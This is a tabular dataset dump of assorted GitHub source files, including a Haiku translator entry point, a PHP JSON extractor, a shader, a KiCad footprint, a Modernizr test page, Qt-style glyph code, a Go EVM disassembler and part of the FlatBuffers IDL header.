text
stringlengths 2
100k
| meta
dict |
---|---|
/*
* Copyright 2005-2006, Axel Dörfler, [email protected]. All rights reserved.
* Distributed under the terms of the MIT License.
*/
#include "EXRTranslator.h"
#include "TranslatorWindow.h"
#include <Application.h>
#include <Catalog.h>
#undef B_TRANSLATION_CONTEXT
#define B_TRANSLATION_CONTEXT "main"
int
main(int /*argc*/, char **/*argv*/)
{
BApplication app("application/x-vnd.Haiku-EXRTranslator");
status_t result;
result = LaunchTranslatorWindow(new EXRTranslator,
B_TRANSLATE("EXR Settings"));
if (result != B_OK)
return 1;
app.Run();
return 0;
}
| {
"pile_set_name": "Github"
} |
<?php
namespace Rubix\ML\Extractors;
use InvalidArgumentException;
use RuntimeException;
use Generator;
use function is_null;
/**
* JSON
*
* Javascript Object Notation is a standardized lightweight plain-text representation that
* is widely used. JSON has the advantage of retaining type information, however since the
* entire JSON blob is read on load, it is not cursorable like CSV or NDJSON.
*
* References:
* [1] T. Bray. (2014). The JavaScript Object Notation (JSON) Data Interchange Format.
*
* @category Machine Learning
* @package Rubix/ML
* @author Andrew DalPino
*/
class JSON implements Extractor
{
/**
* The path to the JSON file.
*
* @var string
*/
protected $path;
/**
* @param string $path
* @throws \InvalidArgumentException
*/
public function __construct(string $path)
{
if (!is_file($path)) {
throw new InvalidArgumentException("Path $path does not exist.");
}
if (!is_readable($path)) {
throw new InvalidArgumentException("Path $path is not readable.");
}
$this->path = $path;
}
/**
* Return an iterator for the records in the data table.
*
* @throws \RuntimeException
* @return \Generator<mixed[]>
*/
public function getIterator() : Generator
{
$data = file_get_contents($this->path);
if (!$data) {
throw new RuntimeException("Could not open $this->path.");
}
$records = json_decode($data, true);
if (is_null($records)) {
throw new RuntimeException('Malformed JSON document.');
}
yield from $records;
}
}
| {
"pile_set_name": "Github"
} |
#version 450
layout (location = 0) in vec3 inNormal;
layout (location = 1) in vec2 inUV;
layout (location = 2) in vec3 inViewVec;
layout (location = 3) in vec3 inLightVec;
layout (location = 0) out vec4 outFragColor;
void main()
{
vec3 N = normalize(inNormal);
vec3 L = normalize(inLightVec);
vec3 V = normalize(inViewVec);
vec3 R = reflect(-L, N);
float diffuse = max(dot(N, L), 0.0);
float specular = pow(max(dot(R, V), 0.0), 1.0);
outFragColor = vec4(vec3(diffuse + specular) * vec3(0.25), 1.0);
} | {
"pile_set_name": "Github"
} |
package mirror.android.rms.resource;
import mirror.RefClass;
import mirror.RefObject;
public class ReceiverResourceM {
public static Class<?> TYPE = RefClass.load(ReceiverResourceM.class, "android.rms.resource.ReceiverResource");
public static RefObject<String[]> mWhiteList;
} | {
"pile_set_name": "Github"
} |
{
"images": [
{
"filename": "ic_control_point_duplicate_36pt.png",
"idiom": "universal",
"scale": "1x"
},
{
"filename": "ic_control_point_duplicate_36pt_2x.png",
"idiom": "universal",
"scale": "2x"
},
{
"filename": "ic_control_point_duplicate_36pt_3x.png",
"idiom": "universal",
"scale": "3x"
}
],
"info": {
"author": "xcode",
"version": 1
}
}
| {
"pile_set_name": "Github"
} |
(module Buzzer_12x9.5RM7.6_RM5.0 (layer F.Cu) (tedit 54D86C8B)
(descr "Generic Buzzer, D12mm height 9.5mm with RM7.6mm")
(tags buzzer)
(fp_text reference SP1 (at -0.254 -3.429 90) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value SPEAKER (at 7.366 0.381 90) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_circle (center 0 0) (end 1.00076 0) (layer F.SilkS) (width 0.15))
(fp_text user + (at 3.1496 -2.4384) (layer F.SilkS)
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_circle (center 0 0) (end 6.20014 0) (layer F.SilkS) (width 0.15))
(pad 1 thru_hole circle (at -3.79984 0) (size 2 2) (drill 1.00076) (layers *.Cu *.Mask F.SilkS))
(pad 2 thru_hole circle (at 3.79984 0) (size 2 2) (drill 1.00076) (layers *.Cu *.Mask F.SilkS))
(pad 1 thru_hole circle (at -2.54 0) (size 2 2) (drill 1.00076) (layers *.Cu *.Mask F.SilkS))
(pad 2 thru_hole circle (at 2.54 0) (size 2 2) (drill 1.00076) (layers *.Cu *.Mask F.SilkS))
(model Buzzers_Beepers.3dshapes/Buzzer_12x9.5RM7.6.wrl
(at (xyz 0 0 0))
(scale (xyz 4 4 4))
(rotate (xyz 0 0 0))
)
)
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html class="+no-js no-js- no-js i-has-no-js">
<head>
<meta charset="UTF-8">
<title>Modernizr Test Suite</title>
<link rel="stylesheet" href="qunit/qunit.css">
<style>
body { margin-bottom: 150px;}
#testbed { font-family: Helvetica; color: #444; padding-bottom: 100px;}
#testbed button { margin: 30px; font-size: 13px;}
.data-notes, .offScreen { display:none;}
table { width: 100%;}
tbody tr:nth-child(even) td, tbody tr:nth-child(even) th { border: 1px solid #ccc; border-left: 0; border-right: 0;}
table td:nth-child(even), table th:nth-child(even) { background: #e6e6e6;}
table tbody tr:hover td, table tbody tr:hover th { background: #e1e100!important;}
td.wrong { background:red!important;}
#html5section { visibility: hidden; }
h1 label { display:none;}
.output { padding: 0 0 0 16px;}
.output ul { margin: 0;}
.output li { color: #854747; }
.output li.yes{color:#090;}
.output li b{color:#000;}
.output {font:14px/1.3 Inconsolata,Consolas,monospace;
-webkit-column-count: 5;
-moz-column-count: 5;
column-count: 5;}
.output + .output { border-top: 5px solid #ccc; }
textarea { width: 100%; min-height: 75px;}
#caniusetrigger { font-size: 38px; font-family: monospace; display:block; }
</style>
<script>window.Modernizr || document.write('<script src="../modernizr.js"><\/script>')</script>
<script src="https://raw.github.com/Modernizr/Modernizr/master/modernizr.js"></script>
<script src="js/lib/polyfills.js"></script>
<script src="js/lib/detect-global.js"></script>
<script src="qunit/qunit.js"></script>
<script src="js/lib/jquery-1.7b2.js"></script>
<script src="js/lib/jsonselect.js"></script>
<script src="js/lib/uaparser.js"></script>
<script src="js/lib/github.js"></script>
<script src="js/setup.js"></script>
<script src="js/unit.js"></script>
<script src="js/unit-caniuse.js"></script>
</head>
<body>
<h1 id="qunit-header">Modernizr Test Suite</h1>
<h2 id="qunit-banner"></h2>
<div id="qunit-testrunner-toolbar"></div>
<h2 id="qunit-userAgent"></h2>
<ol id="qunit-tests"></ol>
<div id="mod-output" class=output></div>
<div id="mod-feattest-output" class=output></div>
<br>
<section><aside>this is an aside within a section</aside></section>
<h5>JSON.stringify(Modernizr)</h5>
<textarea></textarea>
<a href="#" id="caniusetrigger"
onclick="return revealreftests(this)"
title="add a #caniuse hash to this page to make this automatic"
>Show the Ref Tests from Caniuse and Modernizr</a>
<script src="js/dumpdata.js"></script>
<script>
function revealreftests(a){
if (!a) a = document.getElementById('caniusetrigger');
a.parentNode && a.parentNode.removeChild(a);
var iframe = document.createElement('iframe');
iframe.src = 'caniuse.html';
iframe.style.cssText = 'width: 100%; height: 7000px; border: 15px double #F0C; \
-moz-box-sizing: border-box; -webkit-box-sizing: border-box; box-sizing: border-box; ';
document.body.appendChild(iframe);
return false;
}
if (location.hash.replace(/^#/,'') == 'caniuse'){
setTimeout(revealreftests, 100);
}
</script>
</body>
</html>
| {
"pile_set_name": "Github"
} |
/***********************************************************************
*
* Copyright (c) 2012-2020 Barbara Geller
* Copyright (c) 2012-2020 Ansel Sermersheim
*
* Copyright (c) 2015 The Qt Company Ltd.
* Copyright (c) 2012-2016 Digia Plc and/or its subsidiary(-ies).
* Copyright (c) 2008-2012 Nokia Corporation and/or its subsidiary(-ies).
*
* This file is part of CopperSpice.
*
* CopperSpice is free software. You can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public License
* version 2.1 as published by the Free Software Foundation.
*
* CopperSpice is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
*
* https://www.gnu.org/licenses/
*
***********************************************************************/
#include <qglobal.h>
#include <qglyphrun.h>
#include <qglyphrun_p.h>
QGlyphRun::QGlyphRun() : d(new QGlyphRunPrivate)
{
}
QGlyphRun::QGlyphRun(const QGlyphRun &other)
{
d = other.d;
}
QGlyphRun::~QGlyphRun()
{
// Required for QExplicitlySharedDataPointer
}
/*!
\internal
*/
void QGlyphRun::detach()
{
if (d->ref.load() != 1) {
d.detach();
}
}
QGlyphRun &QGlyphRun::operator=(const QGlyphRun &other)
{
d = other.d;
return *this;
}
bool QGlyphRun::operator==(const QGlyphRun &other) const
{
if (d == other.d) {
return true;
}
if ((d->glyphIndexDataSize != other.d->glyphIndexDataSize)
|| (d->glyphPositionDataSize != other.d->glyphPositionDataSize)) {
return false;
}
if (d->glyphIndexData != other.d->glyphIndexData) {
for (int i = 0; i < d->glyphIndexDataSize; ++i) {
if (d->glyphIndexData[i] != other.d->glyphIndexData[i]) {
return false;
}
}
}
if (d->glyphPositionData != other.d->glyphPositionData) {
for (int i = 0; i < d->glyphPositionDataSize; ++i) {
if (d->glyphPositionData[i] != other.d->glyphPositionData[i]) {
return false;
}
}
}
return (d->flags == other.d->flags && d->rawFont == other.d->rawFont);
}
QRawFont QGlyphRun::rawFont() const
{
return d->rawFont;
}
void QGlyphRun::setRawFont(const QRawFont &rawFont)
{
detach();
d->rawFont = rawFont;
}
QVector<quint32> QGlyphRun::glyphIndexes() const
{
if (d->glyphIndexes.constData() == d->glyphIndexData) {
return d->glyphIndexes;
} else {
QVector<quint32> indexes(d->glyphIndexDataSize);
memcpy(indexes.data(), d->glyphIndexData, d->glyphIndexDataSize * sizeof(quint32));
return indexes;
}
}
void QGlyphRun::setGlyphIndexes(const QVector<quint32> &glyphIndexes)
{
detach();
d->glyphIndexes = glyphIndexes; // Keep a reference to the QVector to avoid copying
d->glyphIndexData = glyphIndexes.constData();
d->glyphIndexDataSize = glyphIndexes.size();
}
/*!
Returns the position of the edge of the baseline for each glyph in this set of glyph indexes.
*/
QVector<QPointF> QGlyphRun::positions() const
{
if (d->glyphPositions.constData() == d->glyphPositionData) {
return d->glyphPositions;
} else {
QVector<QPointF> glyphPositions(d->glyphPositionDataSize);
memcpy(glyphPositions.data(), d->glyphPositionData,
d->glyphPositionDataSize * sizeof(QPointF));
return glyphPositions;
}
}
/*!
Sets the positions of the edge of the baseline for each glyph in this set of glyph indexes to
\a positions.
*/
void QGlyphRun::setPositions(const QVector<QPointF> &positions)
{
detach();
d->glyphPositions = positions; // Keep a reference to the vector to avoid copying
d->glyphPositionData = positions.constData();
d->glyphPositionDataSize = positions.size();
}
/*!
Clears all data in the QGlyphRun object.
*/
void QGlyphRun::clear()
{
detach();
d->rawFont = QRawFont();
d->flags = 0;
setPositions(QVector<QPointF>());
setGlyphIndexes(QVector<quint32>());
}
/*!
Sets the glyph indexes and positions of this QGlyphRun to use the first \a size
elements in the arrays \a glyphIndexArray and \a glyphPositionArray. The data is
\e not copied. The caller must guarantee that the arrays are not deleted as long
as this QGlyphRun and any copies of it exists.
\sa setGlyphIndexes(), setPositions()
*/
void QGlyphRun::setRawData(const quint32 *glyphIndexArray, const QPointF *glyphPositionArray,
int size)
{
detach();
d->glyphIndexes.clear();
d->glyphPositions.clear();
d->glyphIndexData = glyphIndexArray;
d->glyphPositionData = glyphPositionArray;
d->glyphIndexDataSize = d->glyphPositionDataSize = size;
}
/*!
Returns true if this QGlyphRun should be painted with an overline decoration.
\sa setOverline()
*/
bool QGlyphRun::overline() const
{
return d->flags & Overline;
}
/*!
Indicates that this QGlyphRun should be painted with an overline decoration if \a overline is true.
Otherwise the QGlyphRun should be painted with no overline decoration.
\sa overline()
*/
void QGlyphRun::setOverline(bool overline)
{
setFlag(Overline, overline);
}
/*!
Returns true if this QGlyphRun should be painted with an underline decoration.
\sa setUnderline()
*/
bool QGlyphRun::underline() const
{
return d->flags & Underline;
}
/*!
Indicates that this QGlyphRun should be painted with an underline decoration if \a underline is
true. Otherwise the QGlyphRun should be painted with no underline decoration.
\sa underline()
*/
void QGlyphRun::setUnderline(bool underline)
{
setFlag(Underline, underline);
}
/*!
Returns true if this QGlyphRun should be painted with a strike out decoration.
\sa setStrikeOut()
*/
bool QGlyphRun::strikeOut() const
{
return d->flags & StrikeOut;
}
/*!
Indicates that this QGlyphRun should be painted with an strike out decoration if \a strikeOut is
true. Otherwise the QGlyphRun should be painted with no strike out decoration.
\sa strikeOut()
*/
void QGlyphRun::setStrikeOut(bool strikeOut)
{
setFlag(StrikeOut, strikeOut);
}
bool QGlyphRun::isRightToLeft() const
{
return d->flags & RightToLeft;
}
void QGlyphRun::setRightToLeft(bool rightToLeft)
{
setFlag(RightToLeft, rightToLeft);
}
QGlyphRun::GlyphRunFlags QGlyphRun::flags() const
{
return d->flags;
}
void QGlyphRun::setFlag(GlyphRunFlag flag, bool enabled)
{
if (d->flags.testFlag(flag) == enabled) {
return;
}
detach();
if (enabled) {
d->flags |= flag;
} else {
d->flags &= ~flag;
}
}
void QGlyphRun::setFlags(GlyphRunFlags flags)
{
if (d->flags == flags) {
return;
}
detach();
d->flags = flags;
}
void QGlyphRun::setBoundingRect(const QRectF &boundingRect)
{
detach();
d->boundingRect = boundingRect;
}
QRectF QGlyphRun::boundingRect() const
{
if (!d->boundingRect.isEmpty() || !d->rawFont.isValid()) {
return d->boundingRect;
}
qreal minX, minY, maxX, maxY;
minX = minY = maxX = maxY = 0;
for (int i = 0, n = qMin(d->glyphIndexDataSize, d->glyphPositionDataSize); i < n; ++i) {
QRectF glyphRect = d->rawFont.boundingRect(d->glyphIndexData[i]);
glyphRect.translate(d->glyphPositionData[i]);
if (i == 0) {
minX = glyphRect.left();
minY = glyphRect.top();
maxX = glyphRect.right();
maxY = glyphRect.bottom();
} else {
minX = qMin(glyphRect.left(), minX);
minY = qMin(glyphRect.top(), minY);
maxX = qMax(glyphRect.right(), maxX);
maxY = qMax(glyphRect.bottom(), maxY);
}
}
return QRectF(QPointF(minX, minY), QPointF(maxX, maxY));
}
bool QGlyphRun::isEmpty() const
{
return d->glyphIndexDataSize == 0;
}
| {
"pile_set_name": "Github"
} |
/*
Real-time Online/Offline Charging System (OCS) for Telecom & ISP environments
Copyright (C) ITsysCOM GmbH
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package console
import "github.com/cgrates/cgrates/utils"
func init() {
c := &CmdStatus{
name: "status",
rpcMethod: utils.CoreSv1Status,
}
commands[c.Name()] = c
c.CommandExecuter = &CommandExecuter{c}
}
type CmdStatus struct {
name string
rpcMethod string
rpcParams *utils.TenantWithOpts
*CommandExecuter
}
func (self *CmdStatus) Name() string {
return self.name
}
func (self *CmdStatus) RpcMethod() string {
return self.rpcMethod
}
func (self *CmdStatus) RpcParams(reset bool) interface{} {
if reset || self.rpcParams == nil {
self.rpcParams = &utils.TenantWithOpts{
Opts: make(map[string]interface{}),
}
}
return self.rpcParams
}
func (self *CmdStatus) PostprocessRpcParams() error {
return nil
}
func (self *CmdStatus) RpcResult() interface{} {
var s map[string]interface{}
return &s
}
func (self *CmdStatus) ClientArgs() (args []string) {
return
}
| {
"pile_set_name": "Github"
} |
// Copyright 2017 The go-ethereum Authors
// This file is part of the go-ethereum library.
//
// The go-ethereum library is free software: you can redistribute it and/or modify
// it under the terms of the GNU Lesser General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// The go-ethereum library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU Lesser General Public License for more details.
//
// You should have received a copy of the GNU Lesser General Public License
// along with the go-ethereum library. If not, see <http://www.gnu.org/licenses/>.
// Provides support for dealing with EVM assembly instructions (e.g., disassembling them).
package asm
import (
"encoding/hex"
"fmt"
"github.com/ethereum/go-ethereum/core/vm"
)
// Iterator for disassembled EVM instructions
type instructionIterator struct {
code []byte
pc uint64
arg []byte
op vm.OpCode
error error
started bool
}
// Create a new instruction iterator.
func NewInstructionIterator(code []byte) *instructionIterator {
it := new(instructionIterator)
it.code = code
return it
}
// Returns true if there is a next instruction and moves on.
func (it *instructionIterator) Next() bool {
if it.error != nil || uint64(len(it.code)) <= it.pc {
// We previously reached an error or the end.
return false
}
if it.started {
// Since the iteration has been already started we move to the next instruction.
if it.arg != nil {
it.pc += uint64(len(it.arg))
}
it.pc++
} else {
// We start the iteration from the first instruction.
it.started = true
}
if uint64(len(it.code)) <= it.pc {
// We reached the end.
return false
}
it.op = vm.OpCode(it.code[it.pc])
if it.op.IsPush() {
a := uint64(it.op) - uint64(vm.PUSH1) + 1
u := it.pc + 1 + a
if uint64(len(it.code)) <= it.pc || uint64(len(it.code)) < u {
it.error = fmt.Errorf("incomplete push instruction at %v", it.pc)
return false
}
it.arg = it.code[it.pc+1 : u]
} else {
it.arg = nil
}
return true
}
// Returns any error that may have been encountered.
func (it *instructionIterator) Error() error {
return it.error
}
// Returns the PC of the current instruction.
func (it *instructionIterator) PC() uint64 {
return it.pc
}
// Returns the opcode of the current instruction.
func (it *instructionIterator) Op() vm.OpCode {
return it.op
}
// Returns the argument of the current instruction.
func (it *instructionIterator) Arg() []byte {
return it.arg
}
// Pretty-print all disassembled EVM instructions to stdout.
func PrintDisassembled(code string) error {
script, err := hex.DecodeString(code)
if err != nil {
return err
}
it := NewInstructionIterator(script)
for it.Next() {
if it.Arg() != nil && 0 < len(it.Arg()) {
fmt.Printf("%05x: %v 0x%x\n", it.PC(), it.Op(), it.Arg())
} else {
fmt.Printf("%05x: %v\n", it.PC(), it.Op())
}
}
return it.Error()
}
// Return all disassembled EVM instructions in human-readable format.
func Disassemble(script []byte) ([]string, error) {
instrs := make([]string, 0)
it := NewInstructionIterator(script)
for it.Next() {
if it.Arg() != nil && 0 < len(it.Arg()) {
instrs = append(instrs, fmt.Sprintf("%05x: %v 0x%x\n", it.PC(), it.Op(), it.Arg()))
} else {
instrs = append(instrs, fmt.Sprintf("%05x: %v\n", it.PC(), it.Op()))
}
}
if err := it.Error(); err != nil {
return nil, err
}
return instrs, nil
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2014 Google Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef FLATBUFFERS_IDL_H_
#define FLATBUFFERS_IDL_H_
#include <map>
#include <memory>
#include <stack>
#include "flatbuffers/base.h"
#include "flatbuffers/flatbuffers.h"
#include "flatbuffers/flexbuffers.h"
#include "flatbuffers/hash.h"
#include "flatbuffers/reflection.h"
#if !defined(FLATBUFFERS_CPP98_STL)
# include <functional>
#endif // !defined(FLATBUFFERS_CPP98_STL)
// This file defines the data types representing a parsed IDL (Interface
// Definition Language) / schema file.
// Limits maximum depth of nested objects.
// Prevents stack overflow while parse flatbuffers or json.
#if !defined(FLATBUFFERS_MAX_PARSING_DEPTH)
# define FLATBUFFERS_MAX_PARSING_DEPTH 64
#endif
namespace flatbuffers {
// The order of these matters for Is*() functions below.
// Additionally, Parser::ParseType assumes bool..string is a contiguous range
// of type tokens.
// clang-format off
#define FLATBUFFERS_GEN_TYPES_SCALAR(TD) \
TD(NONE, "", uint8_t, byte, byte, byte, uint8, u8, UByte, UInt8) \
TD(UTYPE, "", uint8_t, byte, byte, byte, uint8, u8, UByte, UInt8) /* begin scalar/int */ \
TD(BOOL, "bool", uint8_t, boolean,bool, bool, bool, bool, Boolean, Bool) \
TD(CHAR, "byte", int8_t, byte, int8, sbyte, int8, i8, Byte, Int8) \
TD(UCHAR, "ubyte", uint8_t, byte, byte, byte, uint8, u8, UByte, UInt8) \
TD(SHORT, "short", int16_t, short, int16, short, int16, i16, Short, Int16) \
TD(USHORT, "ushort", uint16_t, short, uint16, ushort, uint16, u16, UShort, UInt16) \
TD(INT, "int", int32_t, int, int32, int, int32, i32, Int, Int32) \
TD(UINT, "uint", uint32_t, int, uint32, uint, uint32, u32, UInt, UInt32) \
TD(LONG, "long", int64_t, long, int64, long, int64, i64, Long, Int64) \
TD(ULONG, "ulong", uint64_t, long, uint64, ulong, uint64, u64, ULong, UInt64) /* end int */ \
TD(FLOAT, "float", float, float, float32, float, float32, f32, Float, Float32) /* begin float */ \
TD(DOUBLE, "double", double, double, float64, double, float64, f64, Double, Double) /* end float/scalar */
#define FLATBUFFERS_GEN_TYPES_POINTER(TD) \
TD(STRING, "string", Offset<void>, int, int, StringOffset, int, unused, Int, Offset<String>) \
TD(VECTOR, "", Offset<void>, int, int, VectorOffset, int, unused, Int, Offset<UOffset>) \
TD(STRUCT, "", Offset<void>, int, int, int, int, unused, Int, Offset<UOffset>) \
TD(UNION, "", Offset<void>, int, int, int, int, unused, Int, Offset<UOffset>)
#define FLATBUFFERS_GEN_TYPE_ARRAY(TD) \
TD(ARRAY, "", int, int, int, int, int, unused, Int, Offset<UOffset>)
// The fields are:
// - enum
// - FlatBuffers schema type.
// - C++ type.
// - Java type.
// - Go type.
// - C# / .Net type.
// - Python type.
// - Rust type.
// - Kotlin type.
// using these macros, we can now write code dealing with types just once, e.g.
/*
switch (type) {
#define FLATBUFFERS_TD(ENUM, IDLTYPE, CTYPE, JTYPE, GTYPE, NTYPE, PTYPE, \
RTYPE, KTYPE) \
case BASE_TYPE_ ## ENUM: \
// do something specific to CTYPE here
FLATBUFFERS_GEN_TYPES(FLATBUFFERS_TD)
#undef FLATBUFFERS_TD
}
*/
// If not all FLATBUFFERS_GEN_() arguments are necessary for implementation
// of FLATBUFFERS_TD, you can use a variadic macro (with __VA_ARGS__ if needed).
// In the above example, only CTYPE is used to generate the code, it can be rewritten:
/*
switch (type) {
#define FLATBUFFERS_TD(ENUM, IDLTYPE, CTYPE, ...) \
case BASE_TYPE_ ## ENUM: \
// do something specific to CTYPE here
FLATBUFFERS_GEN_TYPES(FLATBUFFERS_TD)
#undef FLATBUFFERS_TD
}
*/
#define FLATBUFFERS_GEN_TYPES(TD) \
FLATBUFFERS_GEN_TYPES_SCALAR(TD) \
FLATBUFFERS_GEN_TYPES_POINTER(TD) \
FLATBUFFERS_GEN_TYPE_ARRAY(TD)
// Create an enum for all the types above.
#ifdef __GNUC__
__extension__ // Stop GCC complaining about trailing comma with -Wpendantic.
#endif
enum BaseType {
#define FLATBUFFERS_TD(ENUM, ...) \
BASE_TYPE_ ## ENUM,
FLATBUFFERS_GEN_TYPES(FLATBUFFERS_TD)
#undef FLATBUFFERS_TD
};
#define FLATBUFFERS_TD(ENUM, IDLTYPE, CTYPE, ...) \
static_assert(sizeof(CTYPE) <= sizeof(largest_scalar_t), \
"define largest_scalar_t as " #CTYPE);
FLATBUFFERS_GEN_TYPES(FLATBUFFERS_TD)
#undef FLATBUFFERS_TD
inline bool IsScalar (BaseType t) { return t >= BASE_TYPE_UTYPE &&
t <= BASE_TYPE_DOUBLE; }
inline bool IsInteger(BaseType t) { return t >= BASE_TYPE_UTYPE &&
t <= BASE_TYPE_ULONG; }
inline bool IsFloat (BaseType t) { return t == BASE_TYPE_FLOAT ||
t == BASE_TYPE_DOUBLE; }
inline bool IsLong (BaseType t) { return t == BASE_TYPE_LONG ||
t == BASE_TYPE_ULONG; }
inline bool IsBool (BaseType t) { return t == BASE_TYPE_BOOL; }
inline bool IsOneByte(BaseType t) { return t >= BASE_TYPE_UTYPE &&
t <= BASE_TYPE_UCHAR; }
inline bool IsUnsigned(BaseType t) {
return (t == BASE_TYPE_UTYPE) || (t == BASE_TYPE_UCHAR) ||
(t == BASE_TYPE_USHORT) || (t == BASE_TYPE_UINT) ||
(t == BASE_TYPE_ULONG);
}
// clang-format on
extern const char *const kTypeNames[];
extern const char kTypeSizes[];
inline size_t SizeOf(BaseType t) { return kTypeSizes[t]; }
struct StructDef;
struct EnumDef;
class Parser;
// Represents any type in the IDL, which is a combination of the BaseType
// and additional information for vectors/structs_.
struct Type {
explicit Type(BaseType _base_type = BASE_TYPE_NONE, StructDef *_sd = nullptr,
EnumDef *_ed = nullptr, uint16_t _fixed_length = 0)
: base_type(_base_type),
element(BASE_TYPE_NONE),
struct_def(_sd),
enum_def(_ed),
fixed_length(_fixed_length) {}
bool operator==(const Type &o) {
return base_type == o.base_type && element == o.element &&
struct_def == o.struct_def && enum_def == o.enum_def;
}
Type VectorType() const {
return Type(element, struct_def, enum_def, fixed_length);
}
Offset<reflection::Type> Serialize(FlatBufferBuilder *builder) const;
bool Deserialize(const Parser &parser, const reflection::Type *type);
BaseType base_type;
BaseType element; // only set if t == BASE_TYPE_VECTOR
StructDef *struct_def; // only set if t or element == BASE_TYPE_STRUCT
EnumDef *enum_def; // set if t == BASE_TYPE_UNION / BASE_TYPE_UTYPE,
// or for an integral type derived from an enum.
uint16_t fixed_length; // only set if t == BASE_TYPE_ARRAY
};
// Represents a parsed scalar value, it's type, and field offset.
struct Value {
Value()
: constant("0"),
offset(static_cast<voffset_t>(~(static_cast<voffset_t>(0U)))) {}
Type type;
std::string constant;
voffset_t offset;
};
// Helper class that retains the original order of a set of identifiers and
// also provides quick lookup.
template<typename T> class SymbolTable {
public:
~SymbolTable() {
for (auto it = vec.begin(); it != vec.end(); ++it) { delete *it; }
}
bool Add(const std::string &name, T *e) {
vector_emplace_back(&vec, e);
auto it = dict.find(name);
if (it != dict.end()) return true;
dict[name] = e;
return false;
}
void Move(const std::string &oldname, const std::string &newname) {
auto it = dict.find(oldname);
if (it != dict.end()) {
auto obj = it->second;
dict.erase(it);
dict[newname] = obj;
} else {
FLATBUFFERS_ASSERT(false);
}
}
T *Lookup(const std::string &name) const {
auto it = dict.find(name);
return it == dict.end() ? nullptr : it->second;
}
public:
std::map<std::string, T *> dict; // quick lookup
std::vector<T *> vec; // Used to iterate in order of insertion
};
// A name space, as set in the schema.
struct Namespace {
Namespace() : from_table(0) {}
// Given a (potentally unqualified) name, return the "fully qualified" name
// which has a full namespaced descriptor.
// With max_components you can request less than the number of components
// the current namespace has.
std::string GetFullyQualifiedName(const std::string &name,
size_t max_components = 1000) const;
std::vector<std::string> components;
size_t from_table; // Part of the namespace corresponds to a message/table.
};
inline bool operator<(const Namespace &a, const Namespace &b) {
size_t min_size = std::min(a.components.size(), b.components.size());
for (size_t i = 0; i < min_size; ++i) {
if (a.components[i] != b.components[i])
return a.components[i] < b.components[i];
}
return a.components.size() < b.components.size();
}
// Base class for all definition types (fields, structs_, enums_).
struct Definition {
Definition()
: generated(false),
defined_namespace(nullptr),
serialized_location(0),
index(-1),
refcount(1) {}
flatbuffers::Offset<
flatbuffers::Vector<flatbuffers::Offset<reflection::KeyValue>>>
SerializeAttributes(FlatBufferBuilder *builder, const Parser &parser) const;
bool DeserializeAttributes(Parser &parser,
const Vector<Offset<reflection::KeyValue>> *attrs);
std::string name;
std::string file;
std::vector<std::string> doc_comment;
SymbolTable<Value> attributes;
bool generated; // did we already output code for this definition?
Namespace *defined_namespace; // Where it was defined.
// For use with Serialize()
uoffset_t serialized_location;
int index; // Inside the vector it is stored.
int refcount;
};
struct FieldDef : public Definition {
FieldDef()
: deprecated(false),
required(false),
key(false),
shared(false),
native_inline(false),
flexbuffer(false),
nested_flatbuffer(NULL),
padding(0) {}
Offset<reflection::Field> Serialize(FlatBufferBuilder *builder, uint16_t id,
const Parser &parser) const;
bool Deserialize(Parser &parser, const reflection::Field *field);
Value value;
bool deprecated; // Field is allowed to be present in old data, but can't be.
// written in new data nor accessed in new code.
bool required; // Field must always be present.
bool key; // Field functions as a key for creating sorted vectors.
bool shared; // Field will be using string pooling (i.e. CreateSharedString)
// as default serialization behavior if field is a string.
bool native_inline; // Field will be defined inline (instead of as a pointer)
// for native tables if field is a struct.
bool flexbuffer; // This field contains FlexBuffer data.
StructDef *nested_flatbuffer; // This field contains nested FlatBuffer data.
size_t padding; // Bytes to always pad after this field.
};
struct StructDef : public Definition {
StructDef()
: fixed(false),
predecl(true),
sortbysize(true),
has_key(false),
minalign(1),
bytesize(0) {}
void PadLastField(size_t min_align) {
auto padding = PaddingBytes(bytesize, min_align);
bytesize += padding;
if (fields.vec.size()) fields.vec.back()->padding = padding;
}
Offset<reflection::Object> Serialize(FlatBufferBuilder *builder,
const Parser &parser) const;
bool Deserialize(Parser &parser, const reflection::Object *object);
SymbolTable<FieldDef> fields;
bool fixed; // If it's struct, not a table.
bool predecl; // If it's used before it was defined.
bool sortbysize; // Whether fields come in the declaration or size order.
bool has_key; // It has a key field.
size_t minalign; // What the whole object needs to be aligned to.
size_t bytesize; // Size if fixed.
flatbuffers::unique_ptr<std::string> original_location;
};
struct EnumDef;
struct EnumValBuilder;
struct EnumVal {
Offset<reflection::EnumVal> Serialize(FlatBufferBuilder *builder,
const Parser &parser) const;
bool Deserialize(const Parser &parser, const reflection::EnumVal *val);
uint64_t GetAsUInt64() const { return static_cast<uint64_t>(value); }
int64_t GetAsInt64() const { return value; }
bool IsZero() const { return 0 == value; }
bool IsNonZero() const { return !IsZero(); }
std::string name;
std::vector<std::string> doc_comment;
Type union_type;
private:
friend EnumDef;
friend EnumValBuilder;
friend bool operator==(const EnumVal &lhs, const EnumVal &rhs);
EnumVal(const std::string &_name, int64_t _val) : name(_name), value(_val) {}
EnumVal() : value(0) {}
